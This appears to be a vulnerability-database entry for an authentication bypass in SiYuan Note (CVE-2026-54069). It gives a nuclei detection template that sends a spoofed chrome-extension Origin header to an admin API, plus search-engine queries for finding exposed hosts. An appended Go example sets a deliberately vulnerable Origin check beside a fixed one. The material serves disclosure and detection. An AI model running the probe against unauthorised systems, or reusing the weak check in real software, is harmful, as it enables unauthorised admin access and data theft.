SiYuan Note <= 3.6.5 - Authentication Bypass

Reported by ProjectDiscovery, 02 Jul 2026 09:36:57
Type: nuclei
Source: github.com
Views: 20

SiYuan Note up to 3.6.5 allows authentication bypass via spoofed Origin header.

Related entries (reporter, title, published, family):

  ATTACKERKB: CVE-2026-54069 (24 Jun 2026 21:17, attackerkb)
  Circl: CVE-2026-54069 (17 Jun 2026 04:18, circl)
  CVE: CVE-2026-54069 (24 Jun 2026 21:17, cve)
  Cvelist: CVE-2026-54069 SiYuan: Unauthenticated Admin API Access via Blanket chrome-extension:// Origin Allowlist (24 Jun 2026 21:17, cvelist)
  EUVD: EUVD-2026-39125 (24 Jun 2026 21:17, euvd)
  NVD: CVE-2026-54069 (24 Jun 2026 22:16, nvd)
  Positive Technologies: PT-2026-50413 (17 Jun 2026 00:00, ptsecurity)
  Vulnrichment: CVE-2026-54069 SiYuan: Unauthenticated Admin API Access via Blanket chrome-extension:// Origin Allowlist (24 Jun 2026 21:17, vulnrichment)

Template:

id: CVE-2026-54069

info:
  name: SiYuan Note <= 3.6.5 - Authentication Bypass
  author: 0x_Akoko
  severity: high
  description: |
    SiYuan Note 3.6.5 and prior is vulnerable to authentication bypass. The CheckAuth middleware unconditionally trusted all chrome-extension:// origins, granting RoleAdministrator access without token validation to any request with a spoofed Origin header. Fixed in v3.7.0.
  impact: |
    Attackers can access all admin API endpoints, enabling full data exfiltration, stored XSS injection, and configuration tampering.
  remediation: |
    Update to SiYuan Note v3.7.0 or later.
  reference:
    - https://github.com/siyuan-note/siyuan/security/advisories/GHSA-hvr9-72v2-fff3
    - https://nvd.nist.gov/vuln/detail/CVE-2026-54069
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2026-54069
    epss-score: 0.00607
    epss-percentile: 0.44641
    cwe-id: CWE-346
  metadata:
    verified: false
    max-request: 1
    vendor: siyuan-note
    product: siyuan
    shodan-query: title:"SiYuan"
    fofa-query: title="SiYuan" || body="siyuan"
  tags: cve,cve2026,siyuan,auth-bypass,unauth

http:
  - raw:
      - |
        POST /api/system/getConf HTTP/1.1
        Host: {{Hostname}}
        Origin: chrome-extension://auth-test
        Content-Type: application/json

        {}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(content_type, "application/json")'
          - 'contains(body, "\"code\":0")'
          - 'contains_all(body, "\"conf\"", "\"system\"", "\"kernelVersion\"")'
        condition: and
# digest: 4a0a0047304502201ac92fa95ce0feaf25c24ab13bb431f54d78aa395e793e38998e1d0d1b94f245022100887d09d50ec075f07f12cf729123057033dca6c436adeedf2867696dee0ed452:922c64590222798bb761d5b6d8e72950
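To show the defect the template description names in working form, here is an added illustration in Go (the language of SiYuan's kernel), not SiYuan's own code: a constructed middleware with the blanket chrome-extension:// prefix check beside a version that derives the role from the token alone, so a spoofed Origin never elevates privilege. The `Authorization: Token <value>` header form, the role strings, the token value and the error body are assumptions made for the example.

```go
package main

import (
	"crypto/subtle"
	"fmt"
	"net/http"
	"strings"
)

const validToken = "constructed-access-token" // constructed secret for this example

// roleFromRequestWeak reproduces the advisory's anti-pattern (CWE-346): an Origin
// starting with chrome-extension:// counts as identity and the token is never checked.
// Origin is chosen by the client and costs nothing to forge.
func roleFromRequestWeak(r *http.Request) string {
	if strings.HasPrefix(r.Header.Get("Origin"), "chrome-extension://") {
		return "administrator"
	}
	return roleFromToken(r)
}

// roleFromRequestFixed derives the role from the token only. Origin stays a CORS
// concern: it may decide which browser contexts get a response, never who calls.
func roleFromRequestFixed(r *http.Request) string { return roleFromToken(r) }

// roleFromToken expects "Authorization: Token <value>" (assumed header form) and
// compares in constant time.
func roleFromToken(r *http.Request) string {
	tok := strings.TrimPrefix(r.Header.Get("Authorization"), "Token ")
	if subtle.ConstantTimeCompare([]byte(tok), []byte(validToken)) == 1 {
		return "administrator"
	}
	return "visitor"
}

// requireAdmin guards admin endpoints such as /api/system/getConf (body constructed).
func requireAdmin(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if roleFromRequestFixed(r) != "administrator" {
			http.Error(w, `{"code":-1,"msg":"auth failed"}`, http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

func main() {
	r, _ := http.NewRequest("POST", "/api/system/getConf", nil)
	r.Header.Set("Origin", "chrome-extension://auth-test") // Origin from the template above
	fmt.Println("weak:", roleFromRequestWeak(r), "fixed:", roleFromRequestFixed(r))
}
```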


Scores (current as of 17 Jun 2026 04:18):
  Vulners AI Score: 5.8 (medium risk)
  CVSS 4: 9.2
  EPSS: 0.00607